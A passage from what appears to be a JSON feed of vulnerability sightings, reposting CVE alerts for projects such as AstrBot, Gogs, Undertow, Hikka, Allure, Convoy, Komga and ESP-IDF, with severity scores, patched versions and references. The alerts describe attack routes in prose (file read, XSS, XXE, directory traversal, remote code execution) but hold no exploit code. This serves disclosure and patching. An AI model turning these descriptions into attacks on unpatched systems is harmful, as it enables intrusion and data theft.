disclosure, such as API keys for LLM providers, account passwords, and other sensitive data. The vulnerability has been addressed in Pull Request #1676 and is included in version 3.5.13. As a workaround, users can edit the `cmd_config.json` file to disable the dashboard feature as a temporary workaround. However, it is strongly recommended to upgrade to version v3.5.13 or later to fully resolve this issue.\n\ud83d\udccf Published: 2025-06-02T11:16:14.370Z\n\ud83d\udccf Modified: 2025-06-23T18:03:57.703Z\n\ud83d\udd17 References:\n1. https://github.com/AstrBotDevs/AstrBot/security/advisories/GHSA-cq37-g2qp-3c2p\n2. https://github.com/AstrBotDevs/AstrBot/issues/1675\n3. https://github.com/AstrBotDevs/AstrBot/pull/1676\n4. https://github.com/AstrBotDevs/AstrBot/commit/cceadf222c46813c7f41115b40d371e7eb91e492", "creation_timestamp": "2025-06-23T18:50:43.000000Z"}, {"uuid": "32b46e89-add1-4c79-b022-3cba006a92da", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-JJ7C-X25R-R8R3", "type": "seen", "source": "Telegram/x9tyUe3u3o8RRyRxn4MyOTn6X2M4g6ykuZun_Uy8vPfx8ng", "content": "", "creation_timestamp": "2026-04-23T05:18:40.000000Z"}, {"uuid": "7fd8df4c-12d2-45f9-9e10-5eef593c592f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-WG33-J3RV-JQ72", "type": "seen", "source": "Telegram/x9tyUe3u3o8RRyRxn4MyOTn6X2M4g6ykuZun_Uy8vPfx8ng", "content": "", "creation_timestamp": "2026-04-23T05:18:40.000000Z"}, {"uuid": "08cdae58-37c2-452c-b3b5-aa18fcc44781", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-JPV7-P47H-F43J", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/19298", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-52570\n\ud83d\udd25 CVSS Score: 1.7 (cvssV4_0, Vector: CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:U)\n\ud83d\udd39 Description: Letmein is an authenticating port knocker. Prior to version 10.2.1, The connection limiter is implemented incorrectly. It allows an arbitrary amount of simultaneously incoming connections (TCP, UDP and Unix socket) for the services letmeind and letmeinfwd. Therefore, the command line option num-connections is not effective and does not limit the number of simultaneously incoming connections. This issue has been patched in version 10.2.1.\n\ud83d\udccf Published: 2025-06-24T03:13:29.370Z\n\ud83d\udccf Modified: 2025-06-24T03:13:29.370Z\n\ud83d\udd17 References:\n1. https://github.com/mbuesch/letmein/security/advisories/GHSA-jpv7-p47h-f43j\n2. https://github.com/mbuesch/letmein/commit/43207cd77580410d97165d1e3c07361ba6f3558c", "creation_timestamp": "2025-06-24T03:48:13.000000Z"}, {"uuid": "d036aac1-7848-4752-a702-0b350a848763", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-533Q-W4G6-5586", "type": "seen", "source": "Telegram/x9tyUe3u3o8RRyRxn4MyOTn6X2M4g6ykuZun_Uy8vPfx8ng", "content": "", "creation_timestamp": "2026-04-23T05:18:40.000000Z"}, {"uuid": "6ae260eb-093b-4c0b-ba26-bb07098b2bd3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-G596-MF82-W8C3", "type": "seen", "source": "Telegram/x9tyUe3u3o8RRyRxn4MyOTn6X2M4g6ykuZun_Uy8vPfx8ng", "content": "", "creation_timestamp": "2026-04-23T05:18:40.000000Z"}, {"uuid": "508dfa0f-7bf4-40f3-8621-a169d99b9090", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-9VJ4-RV7Q-36QJ", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/19301", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-52574\n\ud83d\udd25 CVSS Score: 7.5 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N)\n\ud83d\udd39 Description: SysmonElixir is a system monitor HTTP service in Elixir. Prior to version 1.0.1, the /read endpoint reads any file from the server's /etc/passwd by default. In v1.0.1, a whitelist was added that limits reading to only files under priv/data. This issue has been patched in version 1.0.1.\n\ud83d\udccf Published: 2025-06-24T02:52:11.889Z\n\ud83d\udccf Modified: 2025-06-24T02:52:11.889Z\n\ud83d\udd17 References:\n1. https://github.com/bocaletto-luca/elixir-system-monitor/security/advisories/GHSA-9vj4-rv7q-36qj\n2. https://github.com/bocaletto-luca/elixir-system-monitor/commit/647a5525f6667a28f1133985213dd080ea11bb87", "creation_timestamp": "2025-06-24T03:48:16.000000Z"}, {"uuid": "2b9a1719-5007-412c-ab4d-56dd1ec2a06d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-XH32-CX6C-CP4V", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/19308", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-47943\n\ud83d\udd25 CVSS Score: 6.3 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:L/A:N)\n\ud83d\udd39 Description: Gogs is an open source self-hosted Git service. In application version 0.14.0+dev and prior, there is a stored cross-site scripting (XSS) vulnerability present in Gogs, which allows client-side Javascript code execution. The vulnerability is caused by the usage of a vulnerable and outdated component: pdfjs-1.4.20 under public/plugins/. This issue has been fixed for gogs.io/gogs in version 0.13.3.\n\ud83d\udccf Published: 2025-06-24T03:48:06.012Z\n\ud83d\udccf Modified: 2025-06-24T03:48:06.012Z\n\ud83d\udd17 References:\n1. https://github.com/gogs/gogs/security/advisories/GHSA-xh32-cx6c-cp4v\n2. https://github.com/gogs/gogs/commit/110117b2e5e5baa4809c819bec701e929d2d8d40\n3. https://github.com/gogs/gogs/releases/tag/v0.13.3", "creation_timestamp": "2025-06-24T04:48:48.000000Z"}, {"uuid": "b180072f-8c2e-4cf0-ba71-4b751d6507ff", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:4226", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/19413", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-1635\n\ud83d\udd25 CVSS Score: 7.5 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)\n\ud83d\udd39 Description: A vulnerability was found in Undertow. This vulnerability impacts a server that supports the wildfly-http-client protocol. Whenever a malicious user opens and closes a connection with the HTTP port of the server and then closes the connection immediately, the server will end with both memory and open file limits exhausted at some point, depending on the amount of memory available. \n\nAt HTTP upgrade to remoting, the WriteTimeoutStreamSinkConduit leaks connections if RemotingConnection is closed by Remoting ServerConnectionOpenListener. Because the remoting connection originates in Undertow as part of the HTTP upgrade, there is an external layer to the remoting connection. This connection is unaware of the outermost layer when closing the connection during the connection opening procedure. Hence, the Undertow WriteTimeoutStreamSinkConduit is not notified of the closed connection in this scenario. Because WriteTimeoutStreamSinkConduit creates a timeout task, the whole dependency tree leaks via that task, which is added to XNIO WorkerThread. So, the workerThread points to the Undertow conduit, which contains the connections and causes the leak.\n\ud83d\udccf Published: 2024-02-19T21:23:14.496Z\n\ud83d\udccf Modified: 2025-06-25T00:32:58.709Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:1674\n2. https://access.redhat.com/errata/RHSA-2024:1675\n3. https://access.redhat.com/errata/RHSA-2024:1676\n4. https://access.redhat.com/errata/RHSA-2024:1677\n5. https://access.redhat.com/errata/RHSA-2024:1860\n6. https://access.redhat.com/errata/RHSA-2024:1861\n7. https://access.redhat.com/errata/RHSA-2024:1862\n8. https://access.redhat.com/errata/RHSA-2024:1864\n9. https://access.redhat.com/errata/RHSA-2024:1866\n10. https://access.redhat.com/errata/RHSA-2024:3354\n11. https://access.redhat.com/errata/RHSA-2024:4884\n12. https://access.redhat.com/errata/RHSA-2025:4226\n13. https://access.redhat.com/errata/RHSA-2025:9583\n14. https://access.redhat.com/security/cve/CVE-2024-1635\n15. https://bugzilla.redhat.com/show_bug.cgi?id=2264928", "creation_timestamp": "2025-06-25T00:49:28.000000Z"}, {"uuid": "01cfc021-e462-4d14-ae09-d16d243e741d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:1866", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/19413", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-1635\n\ud83d\udd25 CVSS Score: 7.5 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)\n\ud83d\udd39 Description: A vulnerability was found in Undertow. This vulnerability impacts a server that supports the wildfly-http-client protocol. Whenever a malicious user opens and closes a connection with the HTTP port of the server and then closes the connection immediately, the server will end with both memory and open file limits exhausted at some point, depending on the amount of memory available. \n\nAt HTTP upgrade to remoting, the WriteTimeoutStreamSinkConduit leaks connections if RemotingConnection is closed by Remoting ServerConnectionOpenListener. Because the remoting connection originates in Undertow as part of the HTTP upgrade, there is an external layer to the remoting connection. This connection is unaware of the outermost layer when closing the connection during the connection opening procedure. Hence, the Undertow WriteTimeoutStreamSinkConduit is not notified of the closed connection in this scenario. Because WriteTimeoutStreamSinkConduit creates a timeout task, the whole dependency tree leaks via that task, which is added to XNIO WorkerThread. So, the workerThread points to the Undertow conduit, which contains the connections and causes the leak.\n\ud83d\udccf Published: 2024-02-19T21:23:14.496Z\n\ud83d\udccf Modified: 2025-06-25T00:32:58.709Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:1674\n2. https://access.redhat.com/errata/RHSA-2024:1675\n3. https://access.redhat.com/errata/RHSA-2024:1676\n4. https://access.redhat.com/errata/RHSA-2024:1677\n5. https://access.redhat.com/errata/RHSA-2024:1860\n6. https://access.redhat.com/errata/RHSA-2024:1861\n7. https://access.redhat.com/errata/RHSA-2024:1862\n8. https://access.redhat.com/errata/RHSA-2024:1864\n9. https://access.redhat.com/errata/RHSA-2024:1866\n10. https://access.redhat.com/errata/RHSA-2024:3354\n11. https://access.redhat.com/errata/RHSA-2024:4884\n12. https://access.redhat.com/errata/RHSA-2025:4226\n13. https://access.redhat.com/errata/RHSA-2025:9583\n14. https://access.redhat.com/security/cve/CVE-2024-1635\n15. https://bugzilla.redhat.com/show_bug.cgi?id=2264928", "creation_timestamp": "2025-06-25T00:49:28.000000Z"}, {"uuid": "5142f6ab-d826-4f9c-b5b7-f4e5dd4106d6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-CVQ5-HHX3-F99P", "type": "seen", "source": "Telegram/kIu__LSWSF-lSSH53f04z2OEjKv8ykvXtTNiYc_9dOAOt4c", "content": "", "creation_timestamp": "2026-04-24T05:18:58.000000Z"}, {"uuid": "aeb5ac46-96f9-49c9-9182-53de1c530331", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-265W-RF2W-CJH4", "type": "seen", "source": "Telegram/x9tyUe3u3o8RRyRxn4MyOTn6X2M4g6ykuZun_Uy8vPfx8ng", "content": "", "creation_timestamp": "2026-04-23T05:18:40.000000Z"}, {"uuid": "82d4b02b-9064-4bd5-bb49-6ab55f43f525", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-GC9W-CC93-RJV8", "type": "seen", "source": "Telegram/Np0HDJKgovD5cW8jduvZL9F8alm_Q8yF8RTJlUUKmbI8o04", "content": "", "creation_timestamp": "2026-04-23T05:19:15.000000Z"}, {"uuid": "2092839f-1f22-4381-94c2-bbb9b2040560", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-47HF-23PW-3M8C", "type": "seen", "source": "Telegram/Np0HDJKgovD5cW8jduvZL9F8alm_Q8yF8RTJlUUKmbI8o04", "content": "", "creation_timestamp": "2026-04-23T05:19:15.000000Z"}, {"uuid": "2c95a7a9-4537-45ae-b72c-9e7fca427069", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-75H4-C557-J89R", "type": "seen", "source": "Telegram/Np0HDJKgovD5cW8jduvZL9F8alm_Q8yF8RTJlUUKmbI8o04", "content": "", "creation_timestamp": "2026-04-23T05:19:15.000000Z"}, {"uuid": "d2a46f2e-1c90-455f-a5fe-7767ecc5c9f1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-7MQR-33RV-P3MP", "type": "published-proof-of-concept", "source": "Telegram/99IlCP_IS9qBv42yzAhiUHqlKgiNRb4WP8dx5pH1uskzhuw", "content": "", "creation_timestamp": "2026-04-17T17:30:37.000000Z"}, {"uuid": "9149111c-94c2-4f54-9d7c-bb27ea58c053", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-VWPQ-WM8W-44WF", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/19403", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-52571\n\ud83d\udd25 CVSS Score: 9.7 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H)\n\ud83d\udd39 Description: Hikka is a Telegram userbot. A vulnerability affects all users of versions below 1.6.2, including most of the forks. It allows an unauthenticated attacker to gain access to Telegram account of a victim, as well as full access to the server. The issue is patched in version 1.6.2. No known workarounds are available.\n\ud83d\udccf Published: 2025-06-24T20:07:24.328Z\n\ud83d\udccf Modified: 2025-06-24T20:07:24.328Z\n\ud83d\udd17 References:\n1. https://github.com/hikariatama/Hikka/security/advisories/GHSA-vwpq-wm8w-44wf\n2. https://github.com/hikariatama/Hikka/commit/9a0e4b1b387ef828c345c43d990421d5afcff5f6", "creation_timestamp": "2025-06-24T20:47:57.000000Z"}, {"uuid": "52fc0bfa-17a7-4ba6-aee6-56a577da5ddf", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:3354", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/19413", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-1635\n\ud83d\udd25 CVSS Score: 7.5 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)\n\ud83d\udd39 Description: A vulnerability was found in Undertow. This vulnerability impacts a server that supports the wildfly-http-client protocol. Whenever a malicious user opens and closes a connection with the HTTP port of the server and then closes the connection immediately, the server will end with both memory and open file limits exhausted at some point, depending on the amount of memory available. \n\nAt HTTP upgrade to remoting, the WriteTimeoutStreamSinkConduit leaks connections if RemotingConnection is closed by Remoting ServerConnectionOpenListener. Because the remoting connection originates in Undertow as part of the HTTP upgrade, there is an external layer to the remoting connection. This connection is unaware of the outermost layer when closing the connection during the connection opening procedure. Hence, the Undertow WriteTimeoutStreamSinkConduit is not notified of the closed connection in this scenario. Because WriteTimeoutStreamSinkConduit creates a timeout task, the whole dependency tree leaks via that task, which is added to XNIO WorkerThread. So, the workerThread points to the Undertow conduit, which contains the connections and causes the leak.\n\ud83d\udccf Published: 2024-02-19T21:23:14.496Z\n\ud83d\udccf Modified: 2025-06-25T00:32:58.709Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:1674\n2. https://access.redhat.com/errata/RHSA-2024:1675\n3. https://access.redhat.com/errata/RHSA-2024:1676\n4. https://access.redhat.com/errata/RHSA-2024:1677\n5. https://access.redhat.com/errata/RHSA-2024:1860\n6. https://access.redhat.com/errata/RHSA-2024:1861\n7. https://access.redhat.com/errata/RHSA-2024:1862\n8. https://access.redhat.com/errata/RHSA-2024:1864\n9. https://access.redhat.com/errata/RHSA-2024:1866\n10. https://access.redhat.com/errata/RHSA-2024:3354\n11. https://access.redhat.com/errata/RHSA-2024:4884\n12. https://access.redhat.com/errata/RHSA-2025:4226\n13. https://access.redhat.com/errata/RHSA-2025:9583\n14. https://access.redhat.com/security/cve/CVE-2024-1635\n15. https://bugzilla.redhat.com/show_bug.cgi?id=2264928", "creation_timestamp": "2025-06-25T00:49:28.000000Z"}, {"uuid": "a4545624-df46-40df-90ba-2a99e4aeb10f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-W59F-67XM-RXX7", "type": "seen", "source": "Telegram/AFbUj5XU0FaWjJKIeAgIoECWWJJu8HcCym9i1gF2DKGuNiY", "content": "", "creation_timestamp": "2026-04-23T05:19:00.000000Z"}, {"uuid": "505aef8d-df73-4294-943c-17d878d6fd6f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-H7QF-QMF3-85QG", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/19409", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-52888\n\ud83d\udd25 CVSS Score: 7.5 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N)\n\ud83d\udd39 Description: Allure 2 is the version 2.x branch of Allure Report, a multi-language test reporting tool. A critical XML External Entity (XXE) vulnerability exists in the xunit-xml-plugin used by Allure 2 prior to version 2.34.1. The plugin fails to securely configure the XML parser (`DocumentBuilderFactory`) and allows external entity expansion when processing test result .xml files. This allows attackers to read arbitrary files from the file system and potentially trigger server-side request forgery (SSRF). Version 2.34.1 contains a patch for the issue.\n\ud83d\udccf Published: 2025-06-24T19:45:22.854Z\n\ud83d\udccf Modified: 2025-06-24T19:56:50.479Z\n\ud83d\udd17 References:\n1. https://github.com/allure-framework/allure2/security/advisories/GHSA-h7qf-qmf3-85qg\n2. https://github.com/allure-framework/allure2/commit/cbcb33719851ff70adce85d38e15d20fc58d4eb7", "creation_timestamp": "2025-06-24T20:48:09.000000Z"}, {"uuid": "c6b81c62-7763-453b-870f-79ab6d560ffb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-33R3-4WHC-44C2", "type": "seen", "source": "Telegram/AFbUj5XU0FaWjJKIeAgIoECWWJJu8HcCym9i1gF2DKGuNiY", "content": "", "creation_timestamp": "2026-04-23T05:19:00.000000Z"}, {"uuid": "2f9ee061-ce8f-44cc-866b-bcb363f3e233", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-688C-VJRC-84RV", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/19433", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-41256\n\ud83d\udd25 CVSS Score: 7.4 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N)\n\ud83d\udd39 Description: Cyberduck and Mountain Duck improper handle TLS certificate pinning for untrusted certificates (e.g., self-signed), since the certificate fingerprint is stored as SHA-1, although SHA-1 is considered weak.\n\n\n\n\n\n\n\nThis issue affects Cyberduck: through 9.1.6; Mountain Duck: through 4.17.5.\n\ud83d\udccf Published: 2025-06-25T09:16:58.586Z\n\ud83d\udccf Modified: 2025-06-25T09:16:58.586Z\n\ud83d\udd17 References:\n1. https://github.com/sbaresearch/advisories/tree/public/2025/SBA-ADV-20250325-02_Cyberduck_Mountain_Duck_Weak_Hash\n2. https://github.com/iterate-ch/cyberduck/security/advisories/GHSA-688c-vjrc-84rv", "creation_timestamp": "2025-06-25T09:47:44.000000Z"}, {"uuid": "ca0428da-20db-461f-896d-f1ec12ccac79", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-68QG-G8MG-6PR7", "type": "seen", "source": "Telegram/AFbUj5XU0FaWjJKIeAgIoECWWJJu8HcCym9i1gF2DKGuNiY", "content": "", "creation_timestamp": "2026-04-23T05:19:00.000000Z"}, {"uuid": "ef3d7872-275e-4617-a406-ac264b58b574", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-43G3-QPWQ-HFGG", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/19385", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-52562\n\ud83d\udd25 CVSS Score: 10 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H)\n\ud83d\udd39 Description: Convoy is a KVM server management panel for hosting businesses. In versions 3.9.0-rc3 to before 4.4.1, there is a directory traversal vulnerability in the LocaleController component of Performave Convoy. An unauthenticated remote attacker can exploit this vulnerability by sending a specially crafted HTTP request with malicious locale and namespace parameters. This allows the attacker to include and execute arbitrary PHP files on the server. This issue has been patched in version 4.4.1. A temporary workaround involves implementing strict Web Application Firewall (WAF) rules to incoming requests targeting the vulnerable endpoints.\n\ud83d\udccf Published: 2025-06-23T20:48:17.456Z\n\ud83d\udccf Modified: 2025-06-24T17:20:21.802Z\n\ud83d\udd17 References:\n1. https://github.com/ConvoyPanel/panel/security/advisories/GHSA-43g3-qpwq-hfgg\n2. https://github.com/ConvoyPanel/panel/commit/f8d6202f3e4912b65dbd9f80ba625576944ab36c", "creation_timestamp": "2025-06-24T17:49:01.000000Z"}, {"uuid": "c3193287-5b1c-4e99-8eee-14fa8a1461da", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-M7MM-6JXP-2M4X", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/19400", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-52880\n\ud83d\udd25 CVSS Score: 4.2 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:U/C:N/I:H/A:N)\n\ud83d\udd39 Description: Komga is a media server for comics, mangas, BDs, magazines and eBooks. A Cross-Site Scripting (XSS) vulnerability has been discovered in versions 1.8.0 through 1.21.3 when serving EPUB resources, either directly from the API, or when reading using the epub reader. The vulnerability lets an attacker perform actions on the victim's behalf. When targeting an admin user, this can be combined with controlling a server-side command to achieve arbitrary code execution. For this vulnerability to be exploited, a malicious EPUB file has to be present in a Komga library, and subsequently accessed in the Epub reader by an admin user. Version 1.22.0 contains a patch for the issue.\n\ud83d\udccf Published: 2025-06-24T19:56:12.692Z\n\ud83d\udccf Modified: 2025-06-24T20:09:48.364Z\n\ud83d\udd17 References:\n1. https://github.com/gotson/komga/security/advisories/GHSA-m7mm-6jxp-2m4x\n2. https://github.com/gotson/komga/commit/5f9cc449b7846ed2066752c72c9ce7b20c3a85a7", "creation_timestamp": "2025-06-24T20:47:54.000000Z"}, {"uuid": "d96c84d8-8b20-49e2-b5c3-69c991fb6374", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-HQHH-CP47-FV5G", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/19404", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-52471\n\ud83d\udd25 CVSS Score: 7.2 (cvssV4_0, Vector: CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:U)\n\ud83d\udd39 Description: ESF-IDF is the Espressif Internet of Things (IOT) Development Framework. An integer underflow vulnerability has been identified in the ESP-NOW protocol implementation within the ESP Wi-Fi component of versions 5.4.1, 5.3.3, 5.2.5, and 5.1.6 of the ESP-IDF framework. This issue stems from insufficient validation of user-supplied data length in the packet receive function. Under certain conditions, this may lead to out-of-bounds memory access and may allow arbitrary memory write operations. On systems without a memory protection scheme, this behavior could potentially be used to achieve remote code execution (RCE) on the target device. In versions 5.4.2, 5.3.4, 5.2.6, and 5.1.6, ESP-NOW has added more comprehensive validation logic on user-supplied data length during packet reception to prevent integer underflow caused by negative value calculations. For ESP-IDF v5.3 and earlier, a workaround can be applied by validating that the `data_len` parameter received in the RX callback (registered via `esp_now_register_recv_cb()`) is a positive value before further processing. For ESP-IDF v5.4 and later, no application-level workaround is available. Users are advised to upgrade to a patched version of ESP-IDF to take advantage of the built-in mitigation.\n\ud83d\udccf Published: 2025-06-24T19:53:06.066Z\n\ud83d\udccf Modified: 2025-06-24T20:02:18.529Z\n\ud83d\udd17 References:\n1. https://github.com/espressif/esp-idf/security/advisories/GHSA-hqhh-cp47-fv5g\n2. https://github.com/espressif/esp-idf/commit/b1a379d57430d265a53aca13d59ddfbf2e7ac409\n3. https://github.com/espressif/esp-idf/commit/c5fc81917805f99e687c81cc56b68dc5df7ef8b5\n4. https://github.com/espressif/esp-idf/commit/d4dafbdc3572387cd4f9a62b776580bc4ac3bde7\n5. https://github.com/espressif/esp-idf/commit/d6ec5a52255b17c1d6ef379e89f9de2c379042f8\n6. https://github.com/espressif/esp-idf/commit/df7757d8279871fa7a2f42ef3962c6c1ec88b8a2\n7. https://github.com/espressif/esp-idf/commit/edc227c5eaeced999b5212943a9434379f8aad80", "creation_timestamp": "2025-06-24T20:48:01.000000Z"}, {"uuid": "057e16c6-354a-44b1-8568-cdae4f08ffc4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:1860", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/19413", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-1635\n\ud83d\udd25 CVSS Score: 7.5 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)\n\ud83d\udd39 Description: A vulnerability was found in Undertow. This vulnerability impacts a server that supports the wildfly-http-client protocol. Whenever a malicious user opens and closes a connection with the HTTP port of the server and then closes the connection immediately, the server will end with both memory and open file limits exhausted at some point, depending on the amount of memory available. \n\nAt HTTP upgrade to remoting, the WriteTimeoutStreamSinkConduit leaks connections if RemotingConnection is closed by Remoting ServerConnectionOpenListener. Because the remoting connection originates in Undertow as part of the HTTP upgrade, there is an external layer to the remoting connection. This connection is unaware of the outermost layer when closing the connection during the connection opening procedure. Hence, the Undertow WriteTimeoutStreamSinkConduit is not notified of the closed connection in this scenario. Because WriteTimeoutStreamSinkConduit creates a timeout task, the whole dependency tree leaks via that task, which is added to XNIO WorkerThread. So, the workerThread points to the Undertow conduit, which contains the connections and causes the leak.\n\ud83d\udccf Published: 2024-02-19T21:23:14.496Z\n\ud83d\udccf Modified: 2025-06-25T00:32:58.709Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:1674\n2. https://access.redhat.com/errata/RHSA-2024:1675\n3. https://access.redhat.com/errata/RHSA-2024:1676\n4. https://access.redhat.com/errata/RHSA-2024:1677\n5. https://access.redhat.com/errata/RHSA-2024:1860\n6. https://access.redhat.com/errata/RHSA-2024:1861\n7. https://access.redhat.com/errata/RHSA-2024:1862\n8. https://access.redhat.com/errata/RHSA-2024:1864\n9. https://access.redhat.com/errata/RHSA-2024:1866\n10. https://access.redhat.com/errata/RHSA-2024:3354\n11. 